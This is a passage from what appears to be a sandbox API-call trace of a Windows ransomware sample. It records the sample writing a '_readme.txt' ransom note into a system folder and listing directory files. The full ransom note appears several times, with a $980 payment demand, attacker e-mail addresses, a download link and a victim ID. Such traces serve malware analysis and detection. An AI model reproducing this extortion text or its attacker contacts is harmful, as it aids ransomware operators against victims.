(lpLibFileName="Shell32.dll") returned 0x75670000 [0094.110] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.110] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0094.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.110] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.110] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0094.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.110] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0094.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.111] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.111] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.111] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.112] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.112] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.113] CloseHandle (hObject=0x5c8) returned 1 [0094.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.114] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a220c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a220c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.114] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a220c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a220c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.114] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.114] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a220c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a220c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a220c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.114] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a220c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a220c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a220c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.114] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.114] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.120] HeapFree (in: 